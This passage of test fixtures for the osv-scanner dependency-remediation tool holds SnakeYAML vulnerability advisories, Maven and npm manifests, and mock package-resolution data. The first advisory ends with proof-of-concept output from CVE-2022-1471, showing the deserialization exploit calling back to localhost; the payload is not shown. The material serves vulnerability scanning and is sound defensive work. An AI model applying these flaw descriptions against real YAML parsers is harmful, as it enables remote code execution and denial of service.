java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)\n\tat java.base/java.lang.reflect.Field.set(Field.java:780)\n\tat org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)\n\t... 9 more\n[+] Dumping Received HTTP Request. 
Will not be empty if PoC worked\nGET /proof-of-concept HTTP/1.1\nUser-Agent: Java/11.0.14\nHost: localhost:8000\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\nConnection: keep-alive\n```\n\n### Further Analysis\nPotential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content.\n\nSee https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject.\n\n### Timeline\n**Date reported**: 4/11/2022\n**Date fixed**: [30/12/2022](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44)\n**Date disclosed**: 10/13/2022", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.0" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.31", "1.32", "1.33", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.33", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-mjmj-j48q-9wg2/GHSA-mjmj-j48q-9wg2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1471" }, { "type": "WEB", "url": "https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true" }, { "type": "WEB", "url": "https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0015" }, { "type": "WEB", "url": 
"https://infosecwriteups.com/%EF%B8%8F-inside-the-160-comment-fight-to-fix-snakeyamls-rce-default-1a20c5ca4d4c" }, { "type": "WEB", "url": "https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc" }, { "type": "WEB", "url": "https://github.com/mbechler/marshalsec" }, { "type": "WEB", "url": "https://confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/wiki/CVE-2022-1471" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64876314" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64634374" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/acc44099f5f4af26ff86b4e4e4cc1c874e2dc5c4" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/5014df1a36f50aca54405bb8433bc99a8847f758" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/11/19/1" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-12-12T21:19:47Z", "nvd_published_at": "2022-12-01T11:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rvwf-54qp-4r6v", "published": "2021-06-04T21:37:45Z", "modified": "2024-03-15T05:36:20.539640Z", "aliases": [ "CVE-2017-18640" ], "summary": "SnakeYAML Entity Expansion during load 
operation", "details": "The Alias feature in SnakeYAML 1.18 allows entity expansion during a load operation, a related issue to CVE-2003-1564.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.26" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-rvwf-54qp-4r6v/GHSA-rvwf-54qp-4r6v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18640" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb2a7037366c58bac6aec6ce3df843a11ef97ae4eb049f05f410eaa5@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc3211c71f7e0973a1825d1988a3921288c06cd9d793eae97ecd34948@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbaa1f513d903c89a08267c91d86811fa5bcc82e0596b6142c5cea7ea@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7b28ac741e32dd5edb2c22485d635275bead7290b056ee56baf8ce0@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5c33d0069c927fae16084f0605895b98d231d7c48527bcb822ac48c@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb34d8d3269ad47a1400f5a1a2d8310e13a80b6576ebd7f512144198d@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb0e033d5ec8233360203431ad96580cf2ec56f47d9a425d894e279c2@%3Cpr.cassandra.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/raebd2019b3da8c2f90f31e8b203b45353f78770ca93bfe5376f5532e@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r900e020760c89f082df1c6e0d46320eba721e4e47bb9eb521e68cd95@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8b57c57cffa01e418868a3c7535b987635ff1fb5ab534203bfa2d64a@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8464b6ec951aace8c807bac9ea526d4f9e3116aa16d38be06f7c6524@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ce3de03facf7e7f3e24fc25d26d555818519dafdb20f29398a3414b@%3Cdev.phoenix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72a3588d62b2de1361dc9648f5d355385735e47f7ba49d089b0e680d@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d54c2da792c74cc14b9b7665ea89e144c9e238ed478d37fd56292e6@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c91e52b3cc9f4e64afe0f34f20507143fd1f756d12681a56a9b38da@%3Ccommits.pulsar.apache.org%3E" }, { "type": "PACKAGE", "url": "https://bitbucket.org/asomov/snakeyaml" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb4b61dbe2ed1c7a88781a9aff5a9e7342cc7ed026aec0418ee67596@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce5c93bba6e815fb62ad38e28ca1943b3019af1eddeb06507ad4e11a@%3Ccommits.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd582c64f66c354240290072f340505f5d026ca944ec417226bb0272e@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd34c0479587e32a656d976649409487d51ca0d296b3e26b6b89c3f5@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/re791a854001ec1f79cd4f47328b270e7a1d9d7056debb8f16d962722@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re851bbfbedd47c690b6e01942acb98ee08bd00df1a94910b905bc8cd@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb1751562ee5146d3aca654a2df76a2c13d8036645ce69946f9c219e@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/recfe569f4f260328b0036f1c82b2956e864d519ab941a5e75d0d832d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf95bebee6dfcc55067cebe8482bd31e6f481d9f74ba8e03f860c3ec7@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe0aab6c3bebbd9cbfdedb65ff3fdf420714bcb8acdfd346077e1263@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CKN7VGIKTYBCAKYBRG55QHXAY5UDZ7HA" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PTVJC54XGX26UJVVYCXZ7D25X3R5T2G6" }, { "type": "WEB", "url": "https://mvnrepository.com/artifact/org.yaml/snakeyaml/1.25/usages" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://bitbucket.org/asomov/snakeyaml/commits/da11ddbd91c1f8392ea932b37fa48110fa54ed8c" }, { "type": "WEB", "url": "https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billion" }, { "type": "WEB", "url": "https://bitbucket.org/asomov/snakeyaml/wiki/Billion%20laughs%20attack" }, { "type": "WEB", "url": "https://bitbucket.org/asomov/snakeyaml/wiki/Changes" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/377" }, { "type": 
"WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/wiki/Changes" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1058e7646988394de6a3fd0857ea9b1ee0de14d7bb28fee5ff782457@%3Ccommits.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r154090b871cf96d985b90864442d84eb027c72c94bc3f0a5727ba2d1@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r16ae4e529401b75a1f5aa462b272b31bf2a108236f882f06fddc14bc@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1703a402f30c8a2ee409f8c6f393e95a63f8c952cc9ee5bf9dd586dc@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r182e9cf6f3fb22b9be0cac4ff0685199741d2ab6e9a4e27a3693c224@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r191ceadb1b883357384981848dfa5235cb02a90070c553afbaf9b3d9@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1aab47b48a757c70e40fc0bcb1fcf1a3951afa6a17aee7cd66cf79f8@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1dfac8b6a7097bcb4979402bbb6e2f8c36d0d9001e3018717eb22b7e@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1ffce2ed3017e9964f03ad2c539d69e49144fc8e9bf772d641612f98@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r20350031c60a77b45e0eded33e9b3e9cb0cbfc5e24e1c63bf264df12@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22ac2aa053b7d9c6b75a49db78125c9316499668d0f4a044f3402e2f@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/r28c9009a48d52cf448f8b02cd823da0f8601d2dff4d66f387a35f1e0@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a5b84fdf59042dc398497e914b5bb1aed77328320b1438144ae1953@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2b05744c0c2867daa5d1a96832965b7d6220328b0ead06c22a6e7854@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2db207a2431a5e9e95e899858ab1f5eabd9bcc790a6ca7193ae07e94@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r436988d2cfe8a770ae361c82b181c5b2bf48a249bad84d8a55a3b46e@%3Cdev.phoenix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r465d2553a31265b042cf5457ef649b71e0722ab89b6ea94a5d59529b@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c682fb8cf69dd14162439656a6ebdf42ea6ad0e4edba95907ea3f14@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d7f37da1bc2df90a5a0f56eb7629b5ea131bfe11eeeb4b4c193f64a@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5510f0125ba409fc1cabd098ab8b457741e5fa314cbd0e61e4339422@%3Cdev.atlas.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55d807f31e64a080c54455897c20b1667ec792e5915132c7b7750533@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r56805265475919252ba7fc10123f15b91097f3009bae86476624ca25@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r643ba53f002ae59068f9352fe1d82e1b6f375387ffb776f13efe8fda@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r666f29a7d0e1f98fa1425ca01efcfa86e6e3856e01d300828aa7c6ea@%3Ccommits.pulsar.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-776" ], "github_reviewed": true, "github_reviewed_at": "2021-06-04T21:34:16Z", "nvd_published_at": "2019-12-12T03:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w37g-rhq8-7m4j", "published": "2022-11-11T19:00:31Z", "modified": "2024-06-25T02:34:20.451152Z", "aliases": [ "CVE-2022-41854" ], "related": [ "CGA-7rjv-f2q6-55mp", "CGA-vgmg-hv2p-g7h8", "CGA-vgwv-c777-jqwv", "CGA-w2jj-p5v7-324x" ], "summary": "Snakeyaml vulnerable to Stack overflow leading to denial of service", "details": "Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. 
This effect may support a denial of service attack.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.32" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.31", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-w37g-rhq8-7m4j/GHSA-w37g-rhq8-7m4j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41854" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/e230a1758842beec93d28eddfde568c21774780a" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/531" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50355" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0009" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-11-21T22:27:27Z", "nvd_published_at": "2022-11-11T13:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] } ] } ================================================ FILE: internal/remediation/testdata/override-workaround/commons/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/override-workaround/commons/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 commons-beanutils commons-beanutils 20020520 commons-httpclient commons-httpclient 3.0 ================================================ FILE: internal/remediation/testdata/override-workaround/guava/android-to-android/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/override-workaround/guava/android-to-android/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 com.google.guava guava 22.0-android ================================================ FILE: internal/remediation/testdata/override-workaround/guava/jre-to-jre/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/override-workaround/guava/jre-to-jre/pom.xml ================================================ 4.0.0 dev.osv 
osv-fix 1 com.google.guava guava 23.1-jre ================================================ FILE: internal/remediation/testdata/override-workaround/guava/none-to-jre/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/override-workaround/guava/none-to-jre/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 com.google.guava guava 20.0 ================================================ FILE: internal/remediation/testdata/override-workaround/universe.yaml ================================================ system: Maven schema: | com.google.guava:guava 20.0 21.0 22.0 22.0-android 23.0 23.0-android 23.1-android 23.1-jre 24.0-android 24.0-jre commons-beanutils:commons-beanutils 1.0 1.2 1.9.0 1.9.3 1.9.4 20020520 20021128.082114 20030211.134440 commons-httpclient:commons-httpclient 2.0.2 3.0 3.1 20020423 ================================================ FILE: internal/remediation/testdata/override-workaround/vulns.json ================================================ { "vulns": [ { "id": "OSV-000-000", "affected": [ { "package": { "ecosystem": "Maven", "name": "com.google.guava:guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "24.0-android" } ] } ], "versions": [ "20.0", "21.0", "22.0", "22.0-android", "23.0", "23.0-android", "23.1-android", "23.1-jre" ] } ] }, { "id": "GHSA-6phf-73q6-gh87", "affected": [ { "package": { "ecosystem": "Maven", "name": "commons-beanutils:commons-beanutils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.4" }, { "introduced": "20020520" } ] } ], "versions": [ "1.0", "1.2", "1.9.0", "1.9.3", "20020520", "20021128.082114", "20030211.134440" ] } ] }, { "id": "GHSA-3832-9276-x7gf", "affected": [ { "package": { "ecosystem": "Maven", "name": "commons-httpclient:commons-httpclient" }, "ranges": [ { "type": 
"ECOSYSTEM", "events": [ { "introduced": "3.0" }, { "fixed": "4.0" } ] } ], "versions": [ "3.0", "3.1" ] } ] } ] } ================================================ FILE: internal/remediation/testdata/santatracker/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/santatracker/package.json ================================================ { "name": "santatracker", "version": "2021.1.0", "license": "Apache-2.0", "scripts": { "dev": "npm run start", "start": "./serve.js", "release": "./release.js", "test": "mocha-headless-server src/api/test.html", "staging-check": "node .cloudbuild/staging-check.js", "postinstall": "ln -s ../node_modules static/node_modules || true" }, "dependencies": { "@babel/core": "^7.6.0", "@babel/preset-env": "^7.6.0", "@rollup/plugin-commonjs": "^21.0.1", "@rollup/plugin-node-resolve": "^13.0.6", "@webcomponents/webcomponentsjs": "^2.4.0", "autoprefixer": "^9.3.0", "babel-plugin-func-wrap": "^1.1.0", "chai": "^4.2.0", "chalk": "^2.4.2", "clipboardy": "^2.1.0", "core-js": "^3.3.2", "custom-event-polyfill": "^1.0.7", "dat.gui": "^0.7.3", "dhost": "^0.1.9", "esm-resolve": "^1.0.6", "event-target": "^1.2.3", "fancy-log": "^1.3.2", "fast-async": "^6.3.8", "firebase": "^8.10.0", "git-last-commit": "^1.0.1", "google-closure-compiler": "^20190909.0.0", "google-closure-library": "^20190909.0.0", "html-entities": "^1.2.1", "html-minifier": "^4.0.0", "html-modules-polyfill": "^0.1.0", "iframe-load": "^0.1.4", "jquery": "^3.5.0", "jsdom": "^12.2.0", "json5": "^2.1.0", "lit-element": "^2.2.1", "lottie-web": "^5.5.10", "mime-types": "^2.1.21", "mocha": "^5.2.0", "mocha-headless-server": "^0.1.2", "parse5": "^5.1.0", "polka": "^0.5.2", "pretty-ms": "^4.0.0", "regenerator-runtime": "^0.13.3", "rimraf": "^3.0.2", "rollup": "^2.59.0", "sass": "^1.22.9", "terser": "^3.10.11", "tmp": "^0.0.33", "unistore": "^3.4.1", 
"web-animations-js": "^2.3.1", "whatwg-fetch": "^3.0.0", "yargs": "^12.0.2" }, "devDependencies": { "@google-cloud/cloudbuild": "^2.6.0", "@google-cloud/error-reporting": "^2.0.4" } } ================================================ FILE: internal/remediation/testdata/santatracker/universe.yaml ================================================ # Automatically generated by generate_mock_resolution_universe on 06 Nov 25 09:04 AEDT. DO NOT EDIT. system: NPM schema: | @arr/every 1.0.0 1.0.1 @babel/code-frame 7.0.0 @babel/highlight@^7.0.0 7.5.5 @babel/highlight@^7.0.0 7.27.1 @babel/helper-validator-identifier@^7.27.1 js-tokens@^4.0.0 picocolors@^1.1.1 @babel/compat-data 7.28.5 @babel/core 7.6.0 @babel/code-frame@^7.5.5 @babel/generator@^7.6.0 @babel/helpers@^7.6.0 @babel/parser@^7.6.0 @babel/template@^7.6.0 @babel/traverse@^7.6.0 @babel/types@^7.6.0 convert-source-map@^1.1.0 debug@^4.1.0 json5@^2.1.0 lodash@^4.17.13 resolve@^1.3.2 semver@^5.4.1 source-map@^0.5.0 7.28.4 @babel/code-frame@^7.27.1 @babel/generator@^7.28.3 @babel/helper-compilation-targets@^7.27.2 @babel/helper-module-transforms@^7.28.3 @babel/helpers@^7.28.4 @babel/parser@^7.28.4 @babel/template@^7.27.2 @babel/traverse@^7.28.4 @babel/types@^7.28.4 @jridgewell/remapping@^2.3.5 convert-source-map@^2.0.0 debug@^4.1.0 gensync@^1.0.0-beta.2 json5@^2.2.3 semver@^6.3.1 @babel/generator 7.6.0 @babel/types@^7.6.0 jsesc@^2.5.1 lodash@^4.17.13 source-map@^0.5.0 trim-right@^1.0.1 7.28.5 @babel/parser@^7.28.5 @babel/types@^7.28.5 @jridgewell/gen-mapping@^0.3.12 @jridgewell/trace-mapping@^0.3.28 jsesc@^3.0.2 @babel/helper-annotate-as-pure 7.0.0 @babel/types@^7.0.0 7.27.3 @babel/types@^7.27.3 @babel/helper-builder-binary-assignment-operator-visitor 7.1.0 @babel/helper-explode-assignable-expression@^7.1.0 @babel/types@^7.0.0 @babel/helper-call-delegate 7.4.4 @babel/helper-hoist-variables@^7.4.4 @babel/traverse@^7.4.4 @babel/types@^7.4.4 @babel/helper-compilation-targets 7.27.2 @babel/compat-data@^7.27.2 
@babel/helper-validator-option@^7.27.1 browserslist@^4.24.0 lru-cache@^5.1.1 semver@^6.3.1 @babel/helper-create-class-features-plugin 7.28.5 Scope peer|@babel/core@^7.0.0 @babel/helper-annotate-as-pure@^7.27.3 @babel/helper-member-expression-to-functions@^7.28.5 @babel/helper-optimise-call-expression@^7.27.1 @babel/helper-replace-supers@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/traverse@^7.28.5 semver@^6.3.1 @babel/helper-create-regexp-features-plugin 7.28.5 Scope peer|@babel/core@^7.0.0 @babel/helper-annotate-as-pure@^7.27.3 regexpu-core@^6.3.1 semver@^6.3.1 @babel/helper-define-map 7.5.5 @babel/helper-function-name@^7.1.0 @babel/types@^7.5.5 lodash@^4.17.13 @babel/helper-define-polyfill-provider 0.6.5 Scope peer|@babel/core@^7.4.0 || ^8.0.0-0 <8.0.0 @babel/helper-compilation-targets@^7.27.2 @babel/helper-plugin-utils@^7.27.1 debug@^4.4.1 lodash.debounce@^4.0.8 resolve@^1.22.10 @babel/helper-explode-assignable-expression 7.1.0 @babel/traverse@^7.1.0 @babel/types@^7.0.0 @babel/helper-function-name 7.1.0 @babel/helper-get-function-arity@^7.0.0 @babel/template@^7.1.0 @babel/types@^7.0.0 @babel/helper-get-function-arity 7.0.0 @babel/types@^7.0.0 @babel/helper-globals 7.28.0 @babel/helper-hoist-variables 7.4.4 @babel/types@^7.4.4 @babel/helper-member-expression-to-functions 7.5.5 @babel/types@^7.5.5 7.28.5 @babel/traverse@^7.28.5 @babel/types@^7.28.5 @babel/helper-module-imports 7.0.0 @babel/types@^7.0.0 7.27.1 @babel/traverse@^7.27.1 @babel/types@^7.27.1 @babel/helper-module-transforms 7.5.5 @babel/helper-module-imports@^7.0.0 @babel/helper-simple-access@^7.1.0 @babel/helper-split-export-declaration@^7.4.4 @babel/template@^7.4.4 @babel/types@^7.5.5 lodash@^4.17.13 7.28.3 Scope peer|@babel/core@^7.0.0 @babel/helper-module-imports@^7.27.1 @babel/helper-validator-identifier@^7.27.1 @babel/traverse@^7.28.3 @babel/helper-optimise-call-expression 7.0.0 @babel/types@^7.0.0 7.27.1 @babel/types@^7.27.1 @babel/helper-plugin-utils 7.0.0 7.27.1 
@babel/helper-regex 7.5.5 lodash@^4.17.13 @babel/helper-remap-async-to-generator 7.1.0 @babel/helper-annotate-as-pure@^7.0.0 @babel/helper-wrap-function@^7.1.0 @babel/template@^7.1.0 @babel/traverse@^7.1.0 @babel/types@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-annotate-as-pure@^7.27.1 @babel/helper-wrap-function@^7.27.1 @babel/traverse@^7.27.1 @babel/helper-replace-supers 7.5.5 @babel/helper-member-expression-to-functions@^7.5.5 @babel/helper-optimise-call-expression@^7.0.0 @babel/traverse@^7.5.5 @babel/types@^7.5.5 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-member-expression-to-functions@^7.27.1 @babel/helper-optimise-call-expression@^7.27.1 @babel/traverse@^7.27.1 @babel/helper-simple-access 7.1.0 @babel/template@^7.1.0 @babel/types@^7.0.0 @babel/helper-skip-transparent-expression-wrappers 7.27.1 @babel/traverse@^7.27.1 @babel/types@^7.27.1 @babel/helper-split-export-declaration 7.4.4 @babel/types@^7.4.4 @babel/helper-string-parser 7.27.1 @babel/helper-validator-identifier 7.28.5 @babel/helper-validator-option 7.27.1 @babel/helper-wrap-function 7.2.0 @babel/helper-function-name@^7.1.0 @babel/template@^7.1.0 @babel/traverse@^7.1.0 @babel/types@^7.2.0 